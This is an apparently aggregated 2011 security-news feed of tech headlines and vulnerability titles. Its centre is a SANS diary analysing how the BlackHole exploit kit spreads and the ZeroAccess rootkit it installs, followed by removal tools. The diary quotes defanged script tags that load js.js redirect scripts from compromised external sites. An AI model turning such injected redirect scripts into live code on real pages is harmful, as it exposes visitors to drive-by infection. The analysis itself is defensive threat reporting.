InfoSec News

(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Google continues to shut down underperforming services, announcing Tuesday that Friend Connect, Knol and a few other services will soon go the way of Google Health and Google Buzz.
Puppet 'certdnsnames' Certificate Validation Security Bypass Vulnerability
Computer scientists at the National Institute of Standards and Technology (NIST) have dramatically enlarged a database designed to improve applications that help programmers find weaknesses in software. This database, the SAMATE ...
A new tool, developed by the National Institute of Standards and Technology (NIST) and offered for free, can help public and private organizations, large and small, to understand and implement the requirements of the Health Insurance ...
Charles H. Romine, new director of the NIST Information Technology Laboratory.Credit: NISTView hi-resolution imageCharles (Chuck) H. Romine became director of the Information Technol
Hewlett-Packard has updated the road map for its high-end Integrity servers to include systems that can accommodate both Xeon- and Itanium-based servers side by side, the company announced Tuesday.
Gibbs has a bit of an obsession with maps and he loves him his iOS apps.
Dell on Tuesday said it has upgraded its PowerEdge servers with the just-released 16-core Opteron processors from Advanced Micro Devices.
The U.S. Federal Communications Commission's staff has found AT&T's proposed US$39 billion acquisition of rival T-Mobile USA to be contrary to the public interest, with officials there saying the deal would result in the largest single concentration in the U.S. mobile market in history.
The Protect IP Act, which would allow the U.S. Department of Justice to seek court orders focused on shutting down websites accused of copyright infringement, could come up for a vote in the U.S. Senate by early December, and one senator is threatening to filibuster the bill.
Oracle Java SE CVE-2011-3555 Remote Java Runtime Environment Vulnerability
Oracle Java SE CVE-2011-3549 Remote Java Runtime Environment Vulnerability
Hewlett-Packard, which recently discontinued its TouchPad tablets, took the top spot among tablet vendors behind Apple's iPad this year through October, according to research from NPD.
Former SAP partner Wellogix is accusing the vendor of stealing its trade secrets and swindling it out of lucrative software projects, according to a lawsuit Wellogix filed last week in U.S. District Court for the Southern District of Texas.
The early brunt of a hard-drive shortage resulting from widespread flooding in Thailand is falling on small PC makers, who are raising computer prices to stem losses.
Finance, working with IT, increasingly must manage the serious risks, from planning to handling fallout.
NJStar Communicator MiniSMTP Server Remote Stack Buffer Overflow Vulnerability
Aviosoft DTV Player '.plf' File Remote Buffer Overflow Vulnerability
Zenprise Device Manager Cross Site Request Forgery Vulnerability
The recent cyberattack on a public water utility in Springfield, Ill. has stoked concerns about the vulnerability of critical infrastructure equipment across the U.S.
Microsoft Excel OBJ Record Stack Overflow Remote Code Execution Vulnerability
[security bulletin] HPSBMU02726 SSRT100685 rev.1 - HP Operations Agent and Performance Agent for AIX, HP-UX, Linux, and Solaris, Local Unauthorized Access

Mpack, IcePack, Eleonore, Phoenix, BlackHole...from time to time we see a new exploit kit being prevalent due the advances it brings. These names are all very well known exploit kits that were/are still quite successful.

One of the most advanced Exploit kits these days is the BlackHole Exploit Kit. It contains a lot of interesting features, like a very detailed control panel, and configuration options as we can see on the following pretty recent CP (Control Panel) screenshots.


So, the first update I would like to bring is the new resilient infrastructure adopted by the BlackHole Exploit Kit.

The most common method used by BlackHole to spread is via links inside phishing emails.

For example:
1) Phishing email contains a link to a website
2) The website contains a redirection to a BH website

But recently they improved this method by adding another layer:

1) Phishing email contains a link to a website
2) The website contains four links like:

#h1#WAIT PLEASE#/h1#
#script language=JavaScript type=text/JavaScript src=hXXp://www.kvicklyhelsinge[.]dk/js.js##/script#
#script language=JavaScript type=text/JavaScript src=hXXp://michellesflowersltd[.]co.uk/js.js##/script#
#script language=JavaScript type=text/JavaScript src=hXXp://myescortsdirectory[.]com/js.js##/script#
#script language=JavaScript type=text/JavaScript src=hXXp://nitconnect[.]net/js.js##/script#

3) Each JS.JS contains a redirection to a final website that contains the BH Exploit kit:


That makes really easy for the author to update to new websites, and at the same time, make it harder for a takedown.

After that you already know what happens, it will check your system and select the best exploit for it, like a PDF exploit.
For some time it was mostly delivering FakeAV and infostealer trojans, like ZeuS and Spyeye, but just recently it started to change...

That bring us to the second update: ZeroAccess
ZeroAccess it not something new...in fact it is been around for some years, but it is showing some very interesting development.

In fact, when I first found it again a few days ago, I though that it was TDL3 Rootkit.

If you remember, TDL3 will infect a different .sys driver on the system at each infection, and when you try to recover the sys file, it will give you the clean file, and that (besides others) is a common characteristic between them.
One recent BH exploit kit is delivering a Downloader trojan. This downloader is then downloading two additional trojans, a ZeroAccess and a ZeuS trojan.
On some infections it may also download a spambot to continue to spread all kinds of spams, likely related to Cutwail botnet.
The recent ZeroAccess trojan will also create the following folders on the system:


Since it wants to make money via AdClicking, you will probably see this kind of traffic associated with it:

On the good side, since it has several items in common with TDSS, we have some good tools to find it as well.
The following tools were tested and worked quite fine against ZeroAccess. Kaspersky TDSSKiller has a good feature to offer a quarantine option if you want.

TDSSKiller.exe - Kaspersky
AntiZeroAccess - WebRoot
RootkitRemover - McAfee

Ah yes, remember that it will be cleaning one trojan, and that you still have at least a ZeuS running on the system...Isn't it a nice pack?

Btw, besides my regular twitter account, I created one to keep posting Security Indicators as I see them. The twitter is @secindicators if you are interested.
Pedro Bueno (pbueno /%%/ isc. sans. org)
Twitter: http://twitter.com/besecure (c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Facebook is working with HTC to build an Android-based smartphone with Facebook social networking services at its core, according to an All Things D report.
On Friday, we reported that VMware Fusion 4.1 can run virtual versions of Leopard and Snow Leopard, a feature previously barred by Apple’s end-user license agreement. On Monday, the other shoe dropped: VMware posted a blog entry that seems to back away from that feature.
Even though it completed the bulk of a major restructuring earlier this year, Cisco continues to tweak its internal organizational structure, combining its network management group into a larger cloud and systems management technology group, according to an internal Cisco memo.
Several Republicans in the U.S. Congress who voted this year to overturn net neutrality rules -- with most opponents arguing the rules would create the first-ever regulation of the Internet -- have now signed on to sponsor one of two bills that would allow the U.S. Department of Justice to seek court orders to shut down websites accused of infringing copyright.
Re: jara 1.6 sql injection vulnerability
Re: XSS in Tiki Wiki CMS Groupware
Pedro Bueno (pbueno /%%/ isc. sans. org) Twitter: http://twitter.com/besecure (c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
The Samsung Illusion smartphone, made from recycled materials, will be offered for free by Verizon Wireless with a two-year contract from Thursday through Monday in an online promotion.
The consumerization of IT trend's leading wave is the use of personal mobile technology, so a smart BYOD strategy lays the groundwork for a complete consumerization approach. Insider (free registration required)
A new class of all-SSD arrays that use compression and deduplication are challenging tiered storage infrastructures with better performance at about the same cost, according to Forrester Research.
This year the number of operators that have implemented HD Voice has almost tripled, and more phones are also compatible with the technology, according to a report by industry organization GSA (Global mobile Suppliers Association).
From storage for virtual machines to cheap all-flash hardware, here are seven movers and shakers in the network storage market today.
Adobe will provide one more version of Flash Player for the new Android 4.0 operating system by year's end before following through on its plan to halt development of the software for mobile browsers.
The Electronic Frontier Foundation (EFF) is proposing an extension to the current SSL chain of trust that aims to improve the security of HTTPS and other secure communication protocols.
The United States’ Stop Online Piracy Act (SOPA), which would allow domain names seizures by U.S. authorities on copyright ‘infringing’ websites, has taken another blow as a leading proponent does a U-turn on supporting it.
The international competition to build an exascale supercomputer is gaining steam. Peter Beckman, a top computer scientist at the Department of Energy's Argonne National Laboratory, explains why the effort is important.
Qualcomm's long-awaited Mirasol reflective color screen technology is on the market, in an e-reader that launched in South Korea on Tuesday.
China is introducing programs to ensure the country's local governments, from provincial down to county and municipal levels, are all using legal software, a top Chinese official said during a meeting with visiting U.S. officials.
Ebay has acquired Hunch, an online platform for customized purchase recommendations, for an undisclosed price, it said Monday.
Microsoft claimed yesterday that users will be able to complete a Windows 8 upgrade much faster, in some cases in one-tenth the time it took similar-configured PCs to upgrade to Windows 7.
Face Unlock, the facial recognition software offered in Android 4.0 on the Galaxy Nexus, is being promoted by Google as an alternative to using a PIN to unlock a phone. But it can apparently be spoofed.
From power to polish, Google's Ice Cream Sandwich delivers a massive burst of energy to the Android platform. Here's a detailed review of what's new and how it measures up.
From power to polish, Google's Ice Cream Sandwich delivers a massive burst of energy to the Android platform. Here's a close-up look at many of its new features.
Samsung's Galaxy Nexus, which will run Google's new Android 4.0 (Ice Cream Sandwich) OS, looks like the next smartphone to beat.
Archlinux Shaman Configuration File Local Privilege Escalation Vulnerability
Support Incident Tracker 'translate.php' Remote Code Execution Vulnerability

Posted by InfoSec News on Nov 22


By Angus Batey
November 22, 2011

DAVID Vincenzetti isn't your typical arms dealer. He's never sold a
machinegun, a grenade or a surface-to-air missile. But, make no mistake,
he has access to a weapon so powerful it could bring a country to its
knees. It's called RCS - Remote Control System - and it's a piece of...

Posted by InfoSec News on Nov 22


China Daily

The United States continues to blame China for alleged intrusions into
US government and defense industry computer networks.

This month a report released by the Project 2049 Initiative, a US-based
think tank, details China's signals intelligence organization, and what
role it thinks the People's Liberation Army has in collecting cyber...

Posted by InfoSec News on Nov 22


By Ben Moshinsky
November 21, 2011

U.K. banks face a day of disaster tomorrow, as part of a simulation led
by the Financial Services Authority to test firms’ responses to a
cyber-attack on payment systems and travel chaos during the London 2012
Olympic Games.

The FSA will start the exercise at 8 a.m., contacting 87...

Posted by InfoSec News on Nov 22


By George V. Hulme
November 21, 2011

Experts in the security of critical infrastructure have had the weekend
to digest news that a public utility water pump in Springfield, Ill. was
destroyed at the hands of remote attackers who were able to gain access
to the SCADA systems controlling it. Their initial advice: Share any...
Contao CMS Cross-Site Scripting Vulnerability
Nanya said on Tuesday it has filed a patent infringement complaint in the U.S. against Japan's Elpida, further escalating the legal battle between the two DRAM makers.

Posted by InfoSec News on Nov 22


By Elinor Mills
InSecurity Complex
CNet News
November 21, 2011

AT&T said today that it successfully thwarted what appeared to be an
attempt by someone to steal mobile customer data.

"We recently detected what could have been an organized attempt to
obtain information on a number of customer accounts," AT&T spokesman
Mark Siegel...
Internet Storm Center Infocon Status